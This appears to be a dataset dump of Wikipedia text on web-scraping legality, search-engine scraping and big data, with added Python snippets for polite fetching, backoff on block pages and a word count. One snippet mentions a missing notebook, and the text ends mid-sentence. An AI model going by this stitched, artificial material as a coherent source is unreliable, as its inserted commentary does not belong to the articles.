Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's web-search software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo, and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking were sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in Cvent, Inc. v. Eventbrite, Inc., the United States District Court for the Eastern District of Virginia ruled that the terms of use must be brought to the users' attention in order for a browse-wrap contract or license to be enforced.
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 to 300 search requests to QVC's website per minute, sometimes up to 36,000 requests per minute), which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. On the plaintiff's website during the period of this trial, the terms-of-use link was displayed among all the links of the site, at the bottom of the page, as on most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor of common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned it to the Ninth Circuit to reconsider in light of the 2021 Supreme Court decision in Van Buren v. United States, which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld its prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court for the Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court.
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
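As a counterpart to the anti-bot measures mentioned at the end of the article above, a scraper can lower its chances of being blocked by honouring robots.txt and pacing its requests. The sketch below uses the standard-library robotparser together with the time and urljoin imports already present in this notebook; the user-agent string, paths, and delay value are assumptions.
import time
import requests
from urllib.parse import urljoin
from urllib.robotparser import RobotFileParser

def polite_fetch(base_url, paths, user_agent='example-scraper', delay=2.0):
    # Consult robots.txt before crawling, and wait between requests
    robots = RobotFileParser()
    robots.set_url(urljoin(base_url, '/robots.txt'))
    robots.read()
    results = {}
    for path in paths:
        url = urljoin(base_url, path)
        if not robots.can_fetch(user_agent, url):
            continue  # skip paths the site asks bots not to crawl
        response = requests.get(url, headers={'User-Agent': user_agent}, timeout=10)
        results[url] = response.status_code
        time.sleep(delay)  # fixed pause so the server is not hammered
    return results

# Hypothetical usage: print(polite_fetch('https://example.com', ['/', '/about']))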
71 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Search_engine_scraping | Search engine scraping is the process of harvesting URLs, descriptions, or other information from search engines. This is a specific form of screen scraping or web scraping dedicated to search engines only. Most commonly, larger search engine optimization (SEO) providers depend on regularly scraping keywords from search engines to monitor the competitive position of their customers' websites for relevant keywords or their indexing status. The process of entering a website and extracting data in an automated fashion is also often called "crawling". Search engines get almost all their data from automated crawling bots. Google is by far the largest search engine, with the most users as well as the most advertising revenue, which makes Google the most important search engine to scrape for SEO-related companies. 1 Although Google does not take legal action against scraping, it uses a range of defensive methods that makes scraping its results a challenging task, even when the scraping tool is realistically spoofing a normal web browser: When search engine defense thinks an access might be automated, the search engine can react differently. The first layer of defense is a captcha page 4 where the user is prompted to verify they are a real person and not a bot or tool. Solving the captcha will create a cookie that permits access to the search engine again for a while. After about one day, the captcha page is displayed again. The second layer of defense is a similar error page but without a captcha; in such a case, the user is completely blocked from using the search engine until the temporary block is lifted, or the user changes their IP. The third layer of defense is a long-term block of the entire network segment. Google has blocked large network blocks for months. This sort of block is likely triggered by an administrator and only happens if a scraping tool is sending a very high number of requests. All these forms of detection may also happen to a normal user, especially users sharing the same IP address or network class (IPv4 ranges as well as IPv6 ranges). To scrape a search engine successfully, the two major factors are time and amount. The more keywords a user needs to scrape and the less time available for the job, the more difficult scraping will be and the more developed a scraping script or tool needs to be. Scraping scripts need to overcome a few technical challenges: citation needed When developing a scraper for a search engine, almost any programming language can be used, although, depending on performance requirements, some languages will be preferable. PHP is a commonly used language to write scraping scripts for websites or backend services, since it has powerful capabilities built in (DOM parsers, libcURL); however, its memory usage is typically about ten times that of comparable C or C++ code. Ruby on Rails as well as Python are also frequently used to automate scraping jobs. Additionally, bash scripting can be used together with cURL as a command-line tool to scrape a search engine. When scraping websites and services, the legal aspect is often a big concern for companies; for web scraping, it greatly depends on the country a scraping user or company is from, as well as which data or website is being scraped, with many different court rulings all over the world.
5 6 However, when it comes to scraping search engines the situation is different: search engines usually do not list intellectual property, as they just repeat or summarize information they scraped from other websites. The largest publicly known incident of a search engine being scraped happened in 2011, when Microsoft was caught scraping unknown keywords from Google for their own, then rather new, Bing service, 7 but even this incident did not result in a court case. |
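The timing point made in the entry above can be illustrated with a small, hedged sketch: pacing requests and backing off when a response looks like a block or captcha page. The endpoint, parameters, and block heuristics below are placeholders, not a description of any real search engine's behaviour:

import time
import random
import requests

def fetch_with_backoff(url, params, max_retries=3):
    # Pace requests and back off when the response suggests automated-access detection.
    delay = 5.0  # conservative starting delay between attempts, in seconds
    for attempt in range(max_retries):
        resp = requests.get(url, params=params, timeout=10)
        # Placeholder heuristics: HTTP 429/503 or a captcha marker in the body.
        blocked = resp.status_code in (429, 503) or "captcha" in resp.text.lower()
        if not blocked:
            return resp
        time.sleep(delay + random.uniform(0, 2))  # jitter avoids a fixed request pattern
        delay *= 2  # exponential backoff before the next attempt
    return None  # give up after max_retries blocked responses

# Hypothetical usage with a placeholder endpoint and query:
# result = fetch_with_backoff("https://example.com/search", {"q": "web scraping"})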
72 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Big_data | Big data primarily refers to data sets that are too large or complex to be dealt with by traditional data-processing application software. Data with many entries (rows) offer greater statistical power, while data with higher complexity (more attributes or columns) may lead to a higher false discovery rate. 2 Though the term is sometimes used loosely, partly due to a lack of a formal definition, the best interpretation is that it is a large body of information that cannot be comprehended when used in small amounts only. 3 Big data analysis challenges include capturing data, data storage, data analysis, search, sharing, transfer, visualization, querying, updating, information privacy, and data sourcing. Big data was originally associated with three key concepts: volume, variety, and velocity. 4 The analysis of big data presents challenges in sampling, which previously allowed only for observations and samples. Thus a fourth concept, veracity, refers to the quality or insightfulness of the data. 5 Without sufficient investment in expertise for big data veracity, the volume and variety of data can produce costs and risks that exceed an organization's capacity to create and capture value from big data. 6 Current usage of the term big data tends to refer to the use of predictive analytics, user behavior analytics, or certain other advanced data analytics methods that extract value from big data, and seldom to a particular size of data set. "There is little doubt that the quantities of data now available are indeed large, but that's not the most relevant characteristic of this new data ecosystem." 7 Analysis of data sets can find new correlations to "spot business trends, prevent diseases, combat crime and so on". 8 Scientists, business executives, medical practitioners, advertisers, and governments alike regularly meet difficulties with large data sets in areas including Internet searches, fintech, healthcare analytics, geographic information systems, urban informatics, and business informatics. Scientists encounter limitations in e-Science work, including meteorology, genomics, 9 connectomics, complex physics simulations, biology, and environmental research. 10 The size and number of available data sets have grown rapidly as data is collected by devices such as mobile devices, cheap and numerous information-sensing Internet of things devices, aerial (remote sensing) equipment, software logs, cameras, microphones, radio-frequency identification (RFID) readers and wireless sensor networks. 11 12 The world's technological per-capita capacity to store information has roughly doubled every 40 months since the 1980s; 13 as of 2012, every day 2.5 exabytes (2.17×2^60 bytes) of data are generated. 14 Based on an IDC report, the global data volume was predicted to grow exponentially from 4.4 zettabytes to 44 zettabytes between 2013 and 2020. By 2025, IDC predicts there will be 163 zettabytes of data. 15 According to IDC, global spending on big data and business analytics (BDA) solutions was estimated to reach $215.7 billion in 2021. 16 17 Meanwhile, a Statista report forecasts the global big data market to grow to $103 billion by 2027. 18 In 2011, McKinsey & Company reported that if US healthcare were to use big data creatively and effectively to drive efficiency and quality, the sector could create more than $300 billion in value every year. 
19 In the developed economies of Europe, government administrators could save more than €100 billion ($149 billion) in operational efficiency improvements alone by using big data. 19 And users of services enabled by personal-location data could capture $600 billion in consumer surplus. 19 One question for large enterprises is determining who should own big-data initiatives that affect the entire organization. 20 Relational database management systems and desktop statistical software packages used to visualize data often have difficulty processing and analyzing big data. The processing and analysis of big data may require "massively parallel software running on tens, hundreds, or even thousands of servers". 21 What qualifies as "big data" varies depending on the capabilities of those analyzing it and their tools. Furthermore, expanding capabilities make big data a moving target. "For some organizations, facing hundreds of gigabytes of data for the first time may trigger a need to reconsider data management options. For others, it may take tens or hundreds of terabytes before data size becomes a significant consideration." 22 The term big data has been in use since the 1990s, with some giving credit to John Mashey for popularizing the term. 23 24 Big data usually includes data sets with sizes beyond the ability of commonly used software tools to capture, curate, manage, and process data within a tolerable elapsed time. 25 Big data philosophy encompasses unstructured, semi-structured and structured data; however, the main focus is on unstructured data. 26 Big data "size" is a constantly moving target; as of 2012 it ranged from a few dozen terabytes to many zettabytes of data. 27 Big data requires a set of techniques and technologies with new forms of integration to reveal insights from data sets that are diverse, complex, and of a massive scale. 28 "Volume", "variety", "velocity", and various other "Vs" are added by some organizations to describe it, a revision challenged by some industry authorities. 29 The Vs of big data were often referred to as the "three Vs", "four Vs", and "five Vs". They represented the qualities of big data in volume, variety, velocity, veracity, and value. 5 Variability is often included as an additional quality of big data. A 2018 definition states "Big data is where parallel computing tools are needed to handle data", and notes, "This represents a distinct and clearly defined change in the computer science used, via parallel programming theories, and losses of some of the guarantees and capabilities made by Codd's relational model." 30 In a comparative study of big datasets, Kitchin and McArdle found that none of the commonly considered characteristics of big data appear consistently across all of the analyzed cases. 31 For this reason, other studies identified the redefinition of power dynamics in knowledge discovery as the defining trait. 32 Instead of focusing on the intrinsic characteristics of big data, this alternative perspective pushes forward a relational understanding of the object, claiming that what matters is the way in which data is collected, stored, made available and analyzed. The growing maturity of the concept more starkly delineates the difference between "big data" and "business intelligence": 33 Big data can be described by the following characteristics: Other possible characteristics of big data are: 42 Big data repositories have existed in many forms, often built by corporations with a special need. 
Commercial vendors historically offered parallel database management systems for big data beginning in the 1990s. For many years, WinterCorp published the largest database report. 43 Teradata Corporation in 1984 marketed the parallel processing DBC 1012 system. Teradata systems were the first to store and analyze 1 terabyte of data in 1992. Hard disk drives were 2.5 GB in 1991, so the definition of big data continuously evolves. Teradata installed the first petabyte-class RDBMS-based system in 2007. As of 2017, there are a few dozen petabyte-class Teradata relational databases installed, the largest of which exceeds 50 PB. Systems up until 2008 were 100% structured relational data. Since then, Teradata has added unstructured data types including XML, JSON, and Avro. In 2000, Seisint Inc. (now LexisNexis Risk Solutions) developed a C++-based distributed platform for data processing and querying known as the HPCC Systems platform. This system automatically partitions, distributes, stores and delivers structured, semi-structured, and unstructured data across multiple commodity servers. Users can write data processing pipelines and queries in a declarative dataflow programming language called ECL. Data analysts working in ECL are not required to define data schemas upfront and can rather focus on the particular problem at hand, reshaping data in the best possible manner as they develop the solution. In 2004, LexisNexis acquired Seisint Inc. 44 and their high-speed parallel processing platform and successfully used this platform to integrate the data systems of ChoicePoint Inc. when it acquired that company in 2008. 45 In 2011, the HPCC systems platform was open-sourced under the Apache v2.0 License. CERN and other physics experiments have collected big data sets for many decades, usually analyzed via high-throughput computing rather than the map-reduce architectures usually meant by the current "big data" movement. In 2004, Google published a paper on a process called MapReduce that uses a similar architecture. The MapReduce concept provides a parallel processing model, and an associated implementation was released to process huge amounts of data. With MapReduce, queries are split and distributed across parallel nodes and processed in parallel (the "map" step). The results are then gathered and delivered (the "reduce" step). The framework was very successful, 46 so others wanted to replicate the algorithm. Therefore, an implementation of the MapReduce framework was adopted by an Apache open-source project named "Hadoop". 47 Apache Spark was developed in 2012 in response to limitations in the MapReduce paradigm, as it adds in-memory processing and the ability to set up many operations (not just map followed by reduce). MIKE2.0 is an open approach to information management that acknowledges the need for revisions due to big data implications identified in an article titled "Big Data Solution Offering". 48 The methodology addresses handling big data in terms of useful permutations of data sources, complexity in interrelationships, and difficulty in deleting (or modifying) individual records. 49 Studies in 2012 showed that a multiple-layer architecture was one option to address the issues that big data presents. A distributed parallel architecture distributes data across multiple servers; these parallel execution environments can dramatically improve data processing speeds. 
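To make the map and reduce steps described above concrete, here is a tiny single-machine word-count sketch in Python; a real MapReduce system distributes the same two phases across many nodes, but the shape of the computation is the same:

from collections import defaultdict

documents = ["big data needs parallel processing", "map then reduce the data"]

# Map step: emit (key, value) pairs from every input record.
mapped = []
for doc in documents:
    for word in doc.split():
        mapped.append((word, 1))

# Shuffle/reduce step: group the pairs by key and aggregate the values.
counts = defaultdict(int)
for word, n in mapped:
    counts[word] += n

print(dict(counts))  # e.g. {'data': 2, 'big': 1, ...}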
This type of architecture inserts data into a parallel DBMS, which implements the use of MapReduce and Hadoop frameworks. This type of framework seeks to make the processing power transparent to the end-user by using a front-end application server. 50 The data lake allows an organization to shift its focus from centralized control to a shared model to respond to the changing dynamics of information management. This enables quick segregation of data into the data lake, thereby reducing the overhead time. 51 52 A 2011 McKinsey Global Institute report characterizes the main components and ecosystem of big data as follows: 53 Multidimensional big data can also be represented as OLAP data cubes or, mathematically, tensors. Array database systems have set out to provide storage and high-level query support on this data type. Additional technologies being applied to big data include efficient tensor-based computation, 54 such as multilinear subspace learning, 55 massively parallel-processing (MPP) databases, search-based applications, data mining, 56 distributed file systems, distributed cache (e.g., burst buffer and Memcached), distributed databases, cloud and HPC-based infrastructure (applications, storage and computing resources), 57 and the Internet. Although many approaches and technologies have been developed, it remains difficult to carry out machine learning with big data. 58 Some MPP relational databases have the ability to store and manage petabytes of data. Implicit is the ability to load, monitor, back up, and optimize the use of the large data tables in the RDBMS. 59 DARPA's Topological Data Analysis program seeks the fundamental structure of massive data sets, and in 2008 the technology went public with the launch of a company called "Ayasdi". 60 The practitioners of big data analytics processes are generally hostile to slower shared storage, 61 preferring direct-attached storage (DAS) in its various forms, from solid state drive (SSD) to high-capacity SATA disk buried inside parallel processing nodes. The perception of shared storage architectures—storage area network (SAN) and network-attached storage (NAS)—is that they are relatively slow, complex, and expensive. These qualities are not consistent with big data analytics systems that thrive on system performance, commodity infrastructure, and low cost. Real or near-real-time information delivery is one of the defining characteristics of big data analytics. Latency is therefore avoided whenever and wherever possible. Data in direct-attached memory or disk is good—data on memory or disk at the other end of an FC SAN connection is not. The cost of a SAN at the scale needed for analytics applications is much higher than other storage techniques. Big data has increased the demand for information management specialists so much that Software AG, Oracle Corporation, IBM, Microsoft, SAP, EMC, HP, and Dell have spent more than $15 billion on software firms specializing in data management and analytics. In 2010, this industry was worth more than $100 billion and was growing at almost 10 percent a year, about twice as fast as the software business as a whole. 8 Developed economies increasingly use data-intensive technologies. There are 4.6 billion mobile-phone subscriptions worldwide, and between 1 billion and 2 billion people accessing the internet. 
8 Between 1990 and 2005, more than 1 billion people worldwide entered the middle class, which means more people became more literate, which in turn led to information growth. The world's effective capacity to exchange information through telecommunication networks was 281 petabytes in 1986, 471 petabytes in 1993, 2.2 exabytes in 2000, 65 exabytes in 2007 13 and predictions put the amount of internet traffic at 667 exabytes annually by 2014. 8 According to one estimate, one-third of the globally stored information is in the form of alphanumeric text and still image data, 62 which is the format most useful for most big data applications. This also shows the potential of yet unused data (i.e. in the form of video and audio content). While many vendors offer off-the-shelf products for big data, experts promote the development of in-house custom-tailored systems if the company has sufficient technical capabilities. 63 The use and adoption of big data within governmental processes allows efficiencies in terms of cost, productivity, and innovation, 64 but does not come without its flaws. Data analysis often requires multiple parts of government (central and local) to work in collaboration and create new and innovative processes to deliver the desired outcome. A common government organization that makes use of big data is the National Security Agency (NSA), which monitors the activities of the Internet constantly in search of potential patterns of suspicious or illegal activities its system may pick up. Civil registration and vital statistics (CRVS) systems collect all certificate statuses from birth to death. CRVS is a source of big data for governments. Research on the effective usage of information and communication technologies for development (also known as "ICT4D") suggests that big data technology can make important contributions but also present unique challenges to international development. 65 66 Advancements in big data analysis offer cost-effective opportunities to improve decision-making in critical development areas such as health care, employment, economic productivity, crime, security, and natural disaster and resource management. 67 68 69 Additionally, user-generated data offers new opportunities to give the unheard a voice. 70 However, longstanding challenges for developing regions such as inadequate technological infrastructure and economic and human resource scarcity exacerbate existing concerns with big data such as privacy, imperfect methodology, and interoperability issues. 67 The challenge of "big data for development" 67 is currently evolving toward the application of this data through machine learning, known as "artificial intelligence for development" (AI4D). 71 A major practical application of big data for development has been "fighting poverty with data". 72 In 2015, Blumenstock and colleagues estimated poverty and wealth from mobile phone metadata, 73 and in 2016 Jean and colleagues combined satellite imagery and machine learning to predict poverty. 74 Using digital trace data to study the labor market and the digital economy in Latin America, Hilbert and colleagues 75 76 argue that digital trace data has several benefits, such as: At the same time, working with digital trace data instead of traditional survey data does not eliminate the traditional challenges involved when working in the field of international quantitative analysis. Priorities change, but the basic discussions remain the same. 
Among the main challenges are: Big data is being rapidly adopted in finance to (1) speed up processing and (2) deliver better, more informed inferences, both internally and to the clients of financial institutions. 78 The financial applications of big data range from investment decisions and trading (processing volumes of available price data, limit order books, economic data and more, all at the same time) to portfolio management (optimizing over an increasingly large array of financial instruments, potentially selected from different asset classes), risk management (credit rating based on extended information), and any other aspect where the data inputs are large. 79 Big data has also been a typical concept within the field of alternative financial services. Some of the major areas involve crowdfunding platforms and cryptocurrency exchanges. 80 Big data analytics has been used in healthcare in providing personalized medicine and prescriptive analytics, clinical risk intervention and predictive analytics, waste and care variability reduction, automated external and internal reporting of patient data, standardized medical terms and patient registries. 81 82 83 84 Some areas of improvement are more aspirational than actually implemented. The level of data generated within healthcare systems is not trivial. With the added adoption of mHealth, eHealth and wearable technologies the volume of data will continue to increase. This includes electronic health record data, imaging data, patient-generated data, sensor data, and other forms of data that are difficult to process. There is now an even greater need for such environments to pay greater attention to data and information quality. 85 "Big data very often means 'dirty data' and the fraction of data inaccuracies increases with data volume growth. Human inspection at the big data scale is impossible and there is a desperate need in health service for intelligent tools for accuracy and believability control and handling of information missed." 86 While extensive information in healthcare is now electronic, it fits under the big data umbrella as most is unstructured and difficult to use. 87 The use of big data in healthcare has raised significant ethical challenges ranging from risks for individual rights, privacy and autonomy, to transparency and trust. 88 Big data in health research is particularly promising in terms of exploratory biomedical research, as data-driven analysis can move forward more quickly than hypothesis-driven research. 89 Trends seen in data analysis can then be tested in traditional, hypothesis-driven follow-up biological research and eventually clinical research. A related application sub-area within the healthcare field that heavily relies on big data is computer-aided diagnosis in medicine. 90 For instance, for epilepsy monitoring it is customary to create 5 to 10 GB of data daily. 91 Similarly, a single uncompressed image of breast tomosynthesis averages 450 MB of data. 92 These are just a few of the many examples where computer-aided diagnosis uses big data. For this reason, big data has been recognized as one of the seven key challenges that computer-aided diagnosis systems need to overcome in order to reach the next level of performance. 
93 A McKinsey Global Institute study found a shortage of 1.5 million highly trained data professionals and managers, 53 and a number of universities, 94 including the University of Tennessee and UC Berkeley, have created master's programs to meet this demand. Private boot camps have also developed programs to meet that demand, including paid programs like The Data Incubator or General Assembly. 95 In the specific field of marketing, one of the problems stressed by Wedel and Kannan 96 is that marketing has several subdomains (e.g., advertising, promotions, product development, branding) that all use different types of data. To understand how the media uses big data, it is first necessary to provide some context on the mechanisms used in the media process. It has been suggested by Nick Couldry and Joseph Turow that practitioners in media and advertising approach big data as many actionable points of information about millions of individuals. The industry appears to be moving away from the traditional approach of using specific media environments such as newspapers, magazines, or television shows and instead taps into consumers with technologies that reach targeted people at optimal times in optimal locations. The ultimate aim is to serve or convey a message or content that is (statistically speaking) in line with the consumer's mindset. For example, publishing environments are increasingly tailoring messages (advertisements) and content (articles) to appeal to consumers, based on information that has been gleaned exclusively through various data-mining activities. 97 Channel 4, the British public-service television broadcaster, is a leader in the field of big data and data analysis. 99 Health insurance providers are collecting data on social "determinants of health" such as food and TV consumption, marital status, clothing size, and purchasing habits, from which they make predictions on health costs, in order to spot health issues in their clients. It is controversial whether these predictions are currently being used for pricing. 100 Big data and the IoT work in conjunction. Data extracted from IoT devices provides a mapping of device inter-connectivity. Such mappings have been used by the media industry, companies, and governments to more accurately target their audience and increase media efficiency. The IoT is also increasingly adopted as a means of gathering sensory data, and this sensory data has been used in medical, 101 manufacturing 102 and transportation 103 contexts. Kevin Ashton, the digital innovation expert who is credited with coining the term, 104 defines the Internet of things in this quote: "If we had computers that knew everything there was to know about things—using data they gathered without any help from us—we would be able to track and count everything, and greatly reduce waste, loss, and cost. We would know when things needed replacing, repairing, or recalling, and whether they were fresh or past their best." Especially since 2015, big data has come to prominence within business operations as a tool to help employees work more efficiently and streamline the collection and distribution of information technology (IT). The use of big data to resolve IT and data collection issues within an enterprise is called IT operations analytics (ITOA). 105 By applying big data principles to the concepts of machine intelligence and deep computing, IT departments can predict potential issues and prevent them. 
105 ITOA businesses offer platforms for systems management that bring data silos together and generate insights from the whole of the system rather than from isolated pockets of data. Compared to survey-based data collection, big data has low cost per data point, applies analysis techniques via machine learning and data mining, and includes diverse and new data sources, e.g., registers, social media, apps, and other forms of digital data. Since 2018, survey scientists have started to examine how big data and survey science can complement each other to allow researchers and practitioners to improve the production and quality of statistics. There have been three Big Data Meets Survey Science (BigSurv) conferences, in 2018, 2020 (virtual), and 2023, and, as of 2023, one conference forthcoming in 2025, 106 a special issue in the Social Science Computer Review, 107 a special issue in the Journal of the Royal Statistical Society, 108 a special issue in EPJ Data Science, 109 and a book called Big Data Meets Social Sciences 110 edited by Craig Hill and five other Fellows of the American Statistical Association. In 2021, the founding members of BigSurv received the Warren J. Mitofsky Innovators Award from the American Association for Public Opinion Research. 111 Big data is notable in marketing due to the constant “datafication” 112 of everyday consumers of the internet, in which all forms of data are tracked. The datafication of consumers can be defined as quantifying many or all human behaviors for the purpose of marketing. 113 The increasingly digital world of rapid datafication makes this idea relevant to marketing because the amount of data constantly grows exponentially. It is predicted to increase from 44 to 163 zettabytes within the span of five years. 114 The size of big data can often be difficult to navigate for marketers. 115 As a result, adopters of big data may find themselves at a disadvantage. Algorithmic findings can be difficult to achieve with such large datasets. 116 Big data in marketing is a highly lucrative tool for large corporations, its value stemming from the possibility of predicting significant trends, interests, or statistical outcomes in a consumer-based manner. 117 There are three significant factors in the use of big data in marketing: Examples of uses of big data in public services: Big data can be used to improve training and understanding competitors, using sport sensors. It is also possible to predict winners in a match using big data analytics. 163 Future performance of players could be predicted as well. 164 Thus, players' value and salary are determined by data collected throughout the season. 165 In Formula One races, race cars with hundreds of sensors generate terabytes of data. These sensors collect data points from tire pressure to fuel burn efficiency. 166 Based on the data, engineers and data analysts decide whether adjustments should be made in order to win a race. In addition, using big data, race teams try to predict the time they will finish the race beforehand, based on simulations using data collected over the season. 167 During the COVID-19 pandemic, big data was raised as a way to minimise the impact of the disease. Significant applications of big data included minimising the spread of the virus, case identification and development of medical treatment. 173 Governments used big data to track infected people to minimise spread. Early adopters included China, Taiwan, South Korea, and Israel. 
174 175 176 Encrypted search and cluster formation in big data were demonstrated in March 2014 at the American Society of Engineering Education. Gautam Siwach engaged at Tackling the challenges of Big Data by MIT Computer Science and Artificial Intelligence Laboratory and Amir Esmailpour at the UNH Research Group investigated the key features of big data as the formation of clusters and their interconnections. They focused on the security of big data and the orientation of the term towards the presence of different types of data in an encrypted form at cloud interface by providing the raw definitions and real-time examples within the technology. Moreover, they proposed an approach for identifying the encoding technique to advance towards an expedited search over encrypted text leading to the security enhancements in big data. 177 In March 2012, The White House announced a national "Big Data Initiative" that consisted of six federal departments and agencies committing more than $200 million to big data research projects. 178 The initiative included a National Science Foundation "Expeditions in Computing" grant of $10 million over five years to the AMPLab 179 at the University of California, Berkeley. 180 The AMPLab also received funds from DARPA, and over a dozen industrial sponsors and uses big data to attack a wide range of problems from predicting traffic congestion 181 to fighting cancer. 182 The White House Big Data Initiative also included a commitment by the Department of Energy to provide $25 million in funding over five years to establish the Scalable Data Management, Analysis and Visualization (SDAV) Institute, 183 led by the Energy Department's Lawrence Berkeley National Laboratory. The SDAV Institute aims to bring together the expertise of six national laboratories and seven universities to develop new tools to help scientists manage and visualize data on the department's supercomputers. The U.S. state of Massachusetts announced the Massachusetts Big Data Initiative in May 2012, which provides funding from the state government and private companies to a variety of research institutions. 184 The Massachusetts Institute of Technology hosts the Intel Science and Technology Center for Big Data in the MIT Computer Science and Artificial Intelligence Laboratory, combining government, corporate, and institutional funding and research efforts. 185 The European Commission is funding the two-year-long Big Data Public Private Forum through their Seventh Framework Program to engage companies, 